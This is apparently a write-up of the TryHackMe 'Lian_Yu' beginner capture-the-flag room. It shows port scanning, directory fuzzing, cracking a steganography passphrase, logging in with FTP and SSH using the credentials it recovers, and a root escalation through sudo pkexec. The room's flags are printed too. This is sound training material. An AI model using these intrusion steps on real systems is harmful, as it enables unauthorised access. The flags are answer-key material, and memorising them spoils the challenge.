TryHackMe - Lian_Yu - Writeup
A beginner level security challenge
Nmap scan
root@ip-10-10-187-225:~# nmap -sCV -A 10.10.87.122
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-17 18:18 BST
Nmap scan report for ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
Host is up (0.00077s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43649/udp status
|_ 100024 1 45593/tcp status
MAC Address: 02:3A:57:44:F8:BD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms ip-10-10-87-122.eu-west-1.compute.internal (10.10.87.122)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds
Directory fuzzing
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,cgi,css,js,py,conf,php,sh,html
[+] Timeout: 10s
===============================================================
2021/06/17 18:27:20 Starting gobuster
===============================================================
/index.html (Status: 200)
/island (Status: 301)
/server-status (Status: 403)
Progress: 194700 / 220561 (88.27%)
Couldn’t able to find the directory then fuzzed into /island directory
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122/island
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: cgi,css,js,py,conf,php,sh,txt,html
[+] Timeout: 10s
===============================================================
2021/06/17 18:59:14 Starting gobuster
===============================================================
/index.html (Status: 200)
/2100 (Status: 301)
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
Hidden text is vigilante from the http://10.10.87.122/island and /island/2100/ source view I found a extension which is .ticket
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
add the extension in your extension list
root@ip-10-10-187-225:~# gobuster dir -u http://10.10.87.122/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf,ticket
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.87.122/island/2100
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,py,sh,txt,cgi,conf,ticket,php,css,js
[+] Timeout: 10s
===============================================================
2021/06/17 19:10:55 Starting gobuster
===============================================================
/index.html (Status: 200)
/green_arrow.ticket (Status: 200)
download the file green_arrow.ticket
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
Decode the password from base58 CyberChef
- what is the FTP Password?
Answer: !#th3h00d
Use the hidden text from http://10.10.87.122/island use the name as ftp username vigilante and use the password we decoded.
root@ip-10-10-187-225:~# ftp 10.10.87.122
Connected to 10.10.87.122.
220 (vsFTPd 3.0.2)
Name (10.10.87.122:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
226 Directory send OK.
Get all the image file also there is another user which is slade. In 3 of the 2 image are fine but Leave_me_alone.png broken let’s use string to see what’s in there found nothing but random strings. Next one is aa.jpg
root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Interesting let’s use stegcracker to crack password.
root@ip-10-10-187-225:~# stegcracker aa.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)
Counting lines in wordlist..
Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: password
Tried 4 passwords
Your file has been written to: aa.jpg.out
password
root@ip-10-10-187-225:~# steghide extract -sf aa.jpg
Enter passphrase:
wrote extracted data to "ss.zip".
extract the ss.zip data
root@ip-10-10-68-68:~# unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
root@ip-10-10-68-68:~# cat shado
M3tahuman
It could be SSH password.
- what is the file name with SSH password?
Answer: shado
I tried to login with ftp username it didn’t worked with that password, Another user is slade so I used that username and the SSH password. It worked.
root@ip-10-10-68-68:~# ssh slade@10.10.87.122
slade@10.10.87.122's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}
--Felicity Smoak
- user.txt
Answer: THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N’T}
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$
User slade can run /usr/bin/pkexec as root. Head out to GTFOBins pkexec
slade@LianYu:~$ sudo pkexec /bin/sh
# whoami
root
# cat /root/root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}
--DEATHSTROKE
Let me know your comments about this machine :)
I will be available @twitter @User6825
Room link: Lian_Yu
Written on June 17, 2021